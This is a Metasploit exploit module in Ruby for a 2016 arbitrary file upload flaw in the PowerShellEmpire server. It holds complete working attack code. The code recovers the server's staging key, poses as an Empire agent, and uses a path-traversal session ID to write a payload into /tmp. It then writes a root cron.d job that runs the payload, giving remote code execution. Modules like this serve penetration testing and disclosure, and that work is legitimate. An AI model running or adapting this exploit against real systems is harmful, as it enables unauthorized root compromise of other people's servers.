## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper TASK_DOWNLOAD = 41 def initialize(info = {}) super(update_info(info, 'Name' => 'PowerShellEmpire Arbitrary File Upload (Skywalker)', 'Description' => %q{ A vulnerability existed in the PowerShellEmpire server prior to commit f030cf62 which would allow an arbitrary file to be written to an attacker controlled location with the permissions of the Empire server. This exploit will write the payload to /tmp/ directory followed by a cron.d file to execute the payload. }, 'Author' => [ 'Spencer McIntyre', # Vulnerability discovery & Metasploit module 'Erik Daguerre' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['URL', 'http://www.harmj0y.net/blog/empire/empire-fails/'] ], 'Payload' => { 'DisableNops' => true, }, 'Platform' => %w{ linux python }, 'Targets' => [ [ 'Python', { 'Arch' => ARCH_PYTHON, 'Platform' => 'python' } ], [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ], [ 'Linux x64', { 'Arch' => ARCH_X86_64, 'Platform' => 'linux' } ] ], 'DefaultOptions' => { 'WfsDelay' => 75 }, 'DefaultTarget' => 0, 'DisclosureDate' => 'Oct 15 2016')) register_options( [ Opt::RPORT(8080), OptString.new('TARGETURI', [ false, 'Base URI path', '/' ]), OptString.new('STAGE0_URI', [ true, 'The resource requested by the initial launcher, default is index.asp', 'index.asp' ]), OptString.new('STAGE1_URI', [ true, 'The resource used by the RSA key post, default is index.jsp', 'index.jsp' ]), OptString.new('PROFILE', [ false, 'Empire agent traffic profile URI.', '' ]) ], self.class) end def check return Exploit::CheckCode::Safe if get_staging_key.nil? Exploit::CheckCode::Appears end def aes_encrypt(key, data, include_mac=false) cipher = OpenSSL::Cipher::AES256.new(:CBC) cipher.encrypt iv = cipher.random_iv cipher.key = key cipher.iv = iv data = iv + cipher.update(data) + cipher.final digest = OpenSSL::Digest.new('sha1') data << OpenSSL::HMAC.digest(digest, key, data) if include_mac data end def create_packet(res_id, data, counter=nil) data = Rex::Text::encode_base64(data) counter = Time.new.to_i if counter.nil? [ res_id, counter, data.length ].pack('VVV') + data end def reversal_key # reversal key for commit da52a626 (March 3rd, 2016) - present (September 21st, 2016) [ [ 160, 0x3d], [ 33, 0x2c], [ 34, 0x24], [ 195, 0x3d], [ 260, 0x3b], [ 37, 0x2c], [ 38, 0x24], [ 199, 0x2d], [ 8, 0x20], [ 41, 0x3d], [ 42, 0x22], [ 139, 0x22], [ 108, 0x2e], [ 173, 0x2e], [ 14, 0x2d], [ 47, 0x29], [ 272, 0x5d], [ 113, 0x3b], [ 82, 0x3b], [ 51, 0x2d], [ 276, 0x2e], [ 213, 0x2e], [ 86, 0x2d], [ 183, 0x3a], [ 24, 0x7b], [ 57, 0x2d], [ 282, 0x20], [ 91, 0x20], [ 92, 0x2d], [ 157, 0x3b], [ 30, 0x28], [ 31, 0x24] ] end def rsa_encode_int(value) encoded = [] while value > 0 do encoded << (value & 0xff) value >>= 8 end Rex::Text::encode_base64(encoded.reverse.pack('C*')) end def rsa_key_to_xml(rsa_key) rsa_key_xml = "<RSAKeyValue>\n" rsa_key_xml << " <Exponent>#{ rsa_encode_int(rsa_key.e.to_i) }</Exponent>\n" rsa_key_xml << " <Modulus>#{ rsa_encode_int(rsa_key.n.to_i) }</Modulus>\n" rsa_key_xml << "</RSAKeyValue>" rsa_key_xml end def get_staging_key # STAGE0_URI resource requested by the initial launcher # The default STAGE0_URI resource is index.asp # https://github.com/adaptivethreat/Empire/blob/293f06437520f4747e82e4486938b1a9074d3d51/setup/setup_database.py#L34 res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, datastore['STAGE0_URI']) }) return unless res and res.code == 200 staging_key = Array.new(32, nil) staging_data = res.body.bytes reversal_key.each_with_index do |(pos, char_code), key_pos| staging_key[key_pos] = staging_data[pos] ^ char_code end return if staging_key.include? nil # at this point the staging key should have been fully recovered but # we'll verify it by attempting to decrypt the header of the stage decrypted = [] staging_data[0..23].each_with_index do |byte, pos| decrypted << (byte ^ staging_key[pos]) end return unless decrypted.pack('C*').downcase == 'function start-negotiate' staging_key end def write_file(path, data, session_id, session_key, server_epoch) # target_url.path default traffic profile for empire agent communication # https://github.com/adaptivethreat/Empire/blob/293f06437520f4747e82e4486938b1a9074d3d51/setup/setup_database.py#L50 data = create_packet( TASK_DOWNLOAD, [ '0', session_id + path, Rex::Text::encode_base64(data) ].join('|'), server_epoch ) if datastore['PROFILE'].blank? profile_uri = normalize_uri(target_uri.path, %w{ admin/get.php news.asp login/process.jsp }.sample) else profile_uri = normalize_uri(target_uri.path, datastore['PROFILE']) end res = send_request_cgi({ 'cookie' => "SESSIONID=#{session_id}", 'data' => aes_encrypt(session_key, data, include_mac=true), 'method' => 'POST', 'uri' => normalize_uri(profile_uri) }) fail_with(Failure::Unknown, "Failed to write file") unless res and res.code == 200 res end def cron_file(command) cron_file = 'SHELL=/bin/sh' cron_file << "\n" cron_file << 'PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/bin' cron_file << "\n" cron_file << "* * * * * root #{command}" cron_file << "\n" cron_file end def exploit vprint_status('Recovering the staging key...') staging_key = get_staging_key if staging_key.nil? fail_with(Failure::Unknown, 'Failed to recover the staging key') end vprint_status("Successfully recovered the staging key: #{staging_key.map { |b| b.to_s(16) }.join(':')}") staging_key = staging_key.pack('C*') rsa_key = OpenSSL::PKey::RSA.new(2048) session_id = Array.new(50, '..').join('/') # STAGE1_URI, The resource used by the RSA key post # The default STAGE1_URI resource is index.jsp # https://github.com/adaptivethreat/Empire/blob/293f06437520f4747e82e4486938b1a9074d3d51/setup/setup_database.py#L37 res = send_request_cgi({ 'cookie' => "SESSIONID=#{session_id}", 'data' => aes_encrypt(staging_key, rsa_key_to_xml(rsa_key)), 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, datastore['STAGE1_URI']) }) fail_with(Failure::Unknown, 'Failed to send the RSA key') unless res and res.code == 200 vprint_status("Successfully sent the RSA key") # decrypt the response and pull out the epoch and session_key body = rsa_key.private_decrypt(res.body) server_epoch = body[0..9].to_i session_key = body[10..-1] print_status('Successfully negotiated an artificial Empire agent') payload_data = nil payload_path = '/tmp/' + rand_text_alpha(8) case target['Arch'] when ARCH_PYTHON cron_command = "python #{payload_path}" payload_data = payload.raw when ARCH_X86, ARCH_X86_64 cron_command = "chmod +x #{payload_path} && #{payload_path}" payload_data = payload.encoded_exe end print_status("Writing payload to #{payload_path}") write_file(payload_path, payload_data, session_id, session_key, server_epoch) cron_path = '/etc/cron.d/' + rand_text_alpha(8) print_status("Writing cron job to #{cron_path}") write_file(cron_path, cron_file(cron_command), session_id, session_key, server_epoch) print_status("Waiting for cron job to run, can take up to 60 seconds") register_files_for_cleanup(cron_path) register_files_for_cleanup(payload_path) # Empire writes to a log file location based on the Session ID, so when # exploiting this vulnerability that file ends up in the root directory. register_files_for_cleanup('/agent.log') end end